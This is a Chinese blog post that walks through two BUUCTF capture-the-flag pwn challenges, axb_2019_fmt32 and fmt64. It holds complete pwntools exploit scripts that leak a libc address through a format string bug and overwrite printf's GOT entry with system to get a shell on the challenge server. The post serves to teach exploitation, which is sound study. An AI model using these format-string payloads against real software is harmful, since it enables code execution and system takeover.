BUUCTF axb_2019_fmt32 & fmt64

已于 2024-07-17 17:24:51 修改
阅读量1.2k 收藏 17
点赞数 17
分类专栏: pwn 文章标签: linux 运维 服务器 python
于 2024-07-17 17:20:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zwb2603096342/article/details/140495295
版权

axb_2019_fmt32

直接看主程序:

发现是有一个明显的格式化字符串漏洞,发现我们没有system,也没有/bin/sh,更没有后门函数,也无法利用栈溢出,那么我们可以通过格式化字符串漏洞实现任意地址可读,修改printf_got为system地址。然后传入/bin/sh\x00,就可以get_shell。

实操:

1.寻找偏移:

我们像往常寻找32位程序偏移一样,传入四个AAAA,但是发现有一个A是在前一个地址的首位,根据小端序存储,d5 d7 ed 41 41 41 41 2d,栈中应该是这样的,说明我们在开头再补上一个A,那么便可以达到偏移8,并且地址不会被截断的情况,如下:

2.获得libc基地址,得到system地址:

知道偏移后,那么就可以通过格式化字符串任意地址可读来获得puts的真实地址(还可以选printf),如何实现呢?偏移地址是8,那么我们的payload如下构造即可:

payload = b'A' + p32(puts_got) + b'b' + b'%8$s'
p.sendafter("Please tell me:",payload)
p.recvuntil(b'b')
puts_addr = u32(p.recv(4))

#puts_addr = u32(p.recvuntil(b'\xf7')[-4:]) 不加b'b'

前面补A,在got表地址后加个b是为了接受puts的真实地址  

如此,通过LibcSearcher就可以获得libc版本(我用的是LibcSearcher3),从而得到libc基地址,获得system地址:

 

3.换got表为system_address:

函数:fmtstr_payload 

# 简述一下
def fmtstr_payload(offset, writes, write_size='', numbwritten=? )
offser -> 偏移量
writes -> 要交换的地址,用字典形式
wirte_size -> 逐byte/short/int写 
numbwritten -> printf已经输出了几个字符了

通过这个pwntools中自带的函数,我们没必要自己手搓换表了。此题要注意numbwritten的问题:

printf已经先输出了Repeater:九个字符,但是我们加了一个A字符防止地址截断,所以先输出了十个字符。

exp:

from pwn import *
from LibcSearcher3 import *
context(arch = 'i386',os = 'linux',log_level='debug')
#p = process("./fmt32")
p = remote("node5.buuoj.cn",28682)
elf = ELF("./fmt32")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
printf_got = elf.got['printf']

# 第一部分泄露libc基地址
payload = b'A' + p32(puts_got) + b'%8$s'
p.sendafter("Please tell me:",payload)
#p.recvuntil(b'b')
puts_addr = u32(p.recvuntil(b'\xf7')[-4:])
print("[+][+][+][+] puts_address = ",hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
base = puts_addr - libc.dump('puts')
system_addr = base + libc.dump('system')
print("[+][+][+][+] sysytem_address = ",hex(system_addr))

#第二部分将printf_got 换成 system
payload1 = b'A' + fmtstr_payload(8,{printf_got:system_addr},write_size='byte',numbwritten=0xa)
p.sendafter("Please tell me:",payload1)
p.sendline(b';/bin/sh\x00') # 注意这个 ; 
p.interactive()

效果:

axb_2019_fmt64

思路一样,具体实现却有着较大的区别。

实操:

1.寻找偏移:

发现这里不需要补A了,地址没有被截断刚好就是第八个

2.获得libc基地址,得到system地址:

如同fmt32一样构造payload:

payload = p64(puts_got) + b"%8$s" 
p.sendafter("Please tell me:",payload)
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("[+][+][+][+] puts_address = ",hex(puts_addr))

结果却是各种报错,并没有接收到7f开头的地址:

为什么呢?我们看看我们接受到了什么: 

我们接收到的只有发送数据00前面的内容,为什么?因为我们发送的是字符数据,printf检测到\x00便会结束输出,它也不知道后面还有没有有用的数据,就直接结束了。那么\x00哪来的呢?看到写的脚本,我们将puts_got用p64打包成8字节数据,但实际上puts实际地址只会用到6字节,那么便有2字节的\x00多出来,那么printf遇到这个\x00就会截止,从而导致接受失败,这也是64位与32位格式化字符串漏洞的区别之一。 下图是gdb调试看到的puts真实地址。

解决办法: 

解决其实挺简单的,我们将\x00填上就行了,并且将puts_got表移到后面去:

# 注意偏移改变了 %9$sAAAA -> 8个字符,占了一个内存单元
payload = b"%9$s" + b'AAAA' + p64(puts_got)
p.sendafter("Please tell me:",payload)
p.recvuntil("Repeater:")
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("[+][+][+][+] puts_address = ",hex(puts_addr))

效果:

3.换got表为system_address:       

 通过泄露地址,图中就是我们需要改的地址,发现这两个地址,仅在红色方框内是不一样的,那么我们仅需要修改红色方框内的就行了。先思考如何去改?

答案很明显用%?$n去修改,但是直接用%$n合适吗?这里先介绍一下覆写的几种%$?n
%xc$n -> 对应的是一个int,四字节的修改
%xc$hn -> 对应的是一个short int ,双字节的修改(half n)
%xc$hhn -> 对应一个char,单字节的修改
知道这几个,可以开始修改了
[+][+][+][+]   puts_address =  0x7fcc5c dc 7690
[+][+][+][+] system_address =  0x7fcc5c d9 d390
1. dc -> d9     采用 %xc$hhn    单字节修改    high_system_addr
2. 7690 -> d390 采用 %xc$hn     双字节修改    low_system_addr
    偏移量x看下面实操

代码实现:

# 第二部分手动换got表
high_system_addr = (system_addr >> 16) & 0xff  # 单字节修改
low_system_addr = system_addr & 0xffff         # 双字节修改
# printf先收到9个字符,可见上面的fmt32
payload = "%" + str(high_system_addr - 9) + "c%?$hhn" + "%" + str(low_system_addr) + "c%?%hn"
print(len(payload)) # 22

大概脚本就是这样,但是此时我们不知道偏移量,此时payload的长度已经达到22了,在连接p64(printf_got)前的payload我们应该达到8字节的整数倍,才可以保证地址不被截断,这里我们可以将payload长度控制在32字节,加上原先的8个内存单元偏移量,那么偏移量就是12了。

完整exp:

from pwn import *
from LibcSearcher import *
context(arch = 'amd64',os = 'linux',log_level='debug')
#p = process("./fmt")
p = remote("node5.buuoj.cn",26052)
elf = ELF("./fmt")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
printf_got = elf.got['printf']

# 第一部分泄露libc
payload = b"%9$s" + b'AAAA' + p64(puts_got) # 注意偏移
p.sendafter("Please tell me:",payload)
p.recvuntil("Repeater:")
puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
libc = LibcSearcher('puts',puts_addr)
base = puts_addr - libc.dump('puts')
system_addr = base + libc.dump('system')
print("[+][+][+][+]   puts_address = ",hex(puts_addr))
print("[+][+][+][+] system_address = ",hex(system_addr))

# 第二部分手动换got表
high_system_addr = (system_addr >> 16) & 0xff  # 单字节修改
low_system_addr = system_addr & 0xffff         # 双字节修改
# 第一部分 : printf先收到9个字符,可见上面的fmt32
# 第二部分 : 要减去前面已经输出的字符,即high_system_addr
payload = "%" + str(high_system_addr - 9) + "c%12$hhn" + "%" + str(low_system_addr - high_system_addr) + "c%13$hn"
payload = payload.encode('utf-8') # 将str类型转化为bytes类型,才可以连接b'a'
payload = payload.ljust(32,b'a')
payload += p64(printf_got+2) + p64(printf_got) # 这不懂得可以参考下面文章
p.sendafter("Please tell me:",payload)
p.sendline(b";/bin/sh\x00")
p.interactive()

效果图:

参考:

64位格式化字符串漏洞修改got表利用详解-安全客 - 安全资讯平台 (anquanke.com)

蒟蒻zwb
关注
专栏目录
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1554
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
BUUCTF axb_2019_fmt32(格式化字符串漏洞)
weixin_45441024的博客
01-07 1250
BUUCTF axb_2019_fmt32(格式化字符串漏洞) 我们还是先check一下,发现RELRO是关闭的,那么好,可以修改GOT表了 显而易见这是一个格式化字符串漏洞 ,接下来我们来测试一下偏移量 这里可以看到我们输入了5个a它的ASCII码是61,但是往后进行查看只有四个61,所以我们在之后的构造中就再补上一个字符就对齐了,我们算一下它的偏移量是8,所以只要输入%7$p就可以了。我们就可以利用这个和格式化字符串来泄露出一个函数的地址,来获取libc版本,就能获得system函数的地址了。
[BUUCTF]PWN——axb_2019_fmt32
mcmuyanga的博客
11-19 1646
axb_2019_fmt32 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况 32位ida载入 alarm(),是闹钟函数,主要功能是设置信号传送闹钟,即用来设置信号SIGALRM在经过参数seconds秒数后发送给目前的进程。如果未设置信号SIGALARM的处理函数,那么alarm()默认处理终止进程 25行,明显的格式化字符串漏洞 这题没有后门函数,也没有系统函数,要用格式化字符串泄露出某个libc函数,来获得libc基址 s 和 format 两个参数
BUUCTFaxb_2019_fmt32
weixin_51055545的博客
04-25 2182
例行检查 是开 了部分relro,可以改写got表,然后栈不可执行不, IDA分析 很简单的一个程序,会先初始化一些后续要用到的栈空间,然后让我们输入,字节数大小会有限制,然后再对我们的输入做一个长度判断,长度符合的话就会调用printf()函数,存在格式化字符串漏洞,程序里没有system,binsh字符串,我们这里就要先leak出地址,然后返回system即可,观察程序不难发现,我们无法溢出去控制返回地址,然而我们可以去改 某一函数的got表地址为system,从而去get shell,通过分析,s
axb_2019_fmt32
、moddemod
07-19 844
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './axb_2019_fmt32' # p = process(proc_name) p = remote('node3.buuoj.cn', 27478) elf = ELF(proc_name) read_got = elf.got['read'..
axb_2019_fmt32 wp
xia0ji233
06-08 457
title: axb_2019_fmt32 wp date: 2021-6-8 22:00:00 tags: write up format string comments: true categories: ctf pwn 临近期末考试了,终于可以光明正大地水博客了。 最近刚写上格式化字符串的漏洞,这不,他来了。这个题目我做过之后感觉难度还是有的,做出这一题至少对格式化字符串漏洞的利用是有一个较深的理解了的。它综合考察了ret2libc和格式化字符串的任意写,以及对got表的理解。 axb_20.
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 903
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
BUUCTF【pwn】解题记录(1-3页已完结)
Assassin
05-05 1933
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
[BUUCTF-pwn]——axb_2019_fmt32
Y_peak的博客
03-18 458
[BUUCTF-pwn]——axb_2019_fmt32 啊啊啊啊啊啊啊,为什么明明很简单的一道题写了好久 from pwn import * from LibcSearcher import LibcSearcher p = remote("node3.buuoj.cn",26515) elf = ELF("./axb_2019_fmt32") puts_got = elf.got["puts"] strlen_got = elf.got["strlen"] payload1 = "%9$s"
axb_2019_fmt32fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’))
weixin_61283545的博客
06-15 197
fmtstr_payload(offset, writes, numbwritten=0, write_size=‘byte’) 第一个参数表示格式化字符串的偏移 第二个参数表示需要利用%n写入的数据,采用字典形式,我们要将printf的GOT数据改为system函数地址,就写成{printfGOT:systemAddress}; 第三个参数表示已经输出的字符个数 第四个参数表示写入方式,是按字节(byte)、按双字节(short)还是按四字节(int),对应着hhn、hn和n,默认值是byte,即按hhn
linux 格式化字符串漏洞
sky123博客
02-04 2143
格式化字符串漏洞 格式化字符串介绍 常见格式化字符串函数 函数 基本介绍 printf 输出到stdout fprintf 输出到指定FILE流 vprintf 根据参数列表格式化输出到stdout vfprintf 根据参数列表格式化输出到FILE流 sprintf 输出到字符串 snprintf 输出指定字节数到字符串 vsprintf 根据参数列表格式化输出到字符串 vsnprintf 根据参数列表格式化输出指定字节到字符串 常用格式化字符串形式 %[p
【pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 6177
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串函
格式化字符串漏洞泄露got表
Fzuim的博客
11-20 709
#include <stdio.h> int main() { char s[100]; scanf("%s", s); printf(s); return 0; } 编译命令:gcc -m32 -fno-stack-protector -no-pie -o fmt fmt.c 泄露的payload先贴出来,再理解 # coding:utf-8 from pwn import* from LibcSearcher import * context.log_level = '
格式化字符串漏洞原理理解
Ttw_
03-16 603
在X86结构下,格式化字符串的参数通过栈传递,根据cdecl的调用约定,在进入printf函数前,程序将参数从右往左依次压栈;使用多个%s当作printf的格式化字符串参数即可让程序触发崩溃,原因是%s会让printf从栈中获取一个数字并将其当作一个地址,当该数字不是一个地址时,或该地址受到保护,都会使程序触发崩溃。攻击者使用类似"%s"的格式规范就可以泄露出参数(指针)所指向内存的数据,如果攻击者可以操纵这个参数的值,那么就可以泄露任意地址的内容。我们可以通过%7$p来打印我们输入的一个双字的内容。
buuctf gyctf_2020_borrowstack(栈迁移)和r2t4,axb_2019_fmt32(格式化字符串和fmtstr_payload工具的使用)
carol2358的博客
05-24 1355
头痛,之前栈学的漏洞好多,只学了相关知识没有做题,真正碰到题目就不会了,真的头痛 gyctf_2020_borrowstack 栈迁移 payload设置 此种攻击方法的关键在于如何同时控制ebp和eip,那么如何同时控制ebp和eip的值的? 1、使用ROPgadget查找leave;ret指令所在的地址 2、覆盖完成bufer后,使用可控制的地址覆盖ebp的值,使用上述leave;ret指令所在地址覆盖ret的值。 程序运行(32位,64位同理): 1、当函数正常返回时,执行leave;re
E:\Qt6book_Axb_6.0\sampl3_1\widget.cpp:6: error: allocation of incomplete type 'Ui::Widget'
最新发布
06-04
这个错误提示是因为在Widget.cpp文件中,你尝试对一个不完整的类型Ui::Widget进行分配内存的操作。这通常是因为你在Widget.cpp中使用了Ui::Widget类的成员变量或成员函数,但是没有包含相应的头文件。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值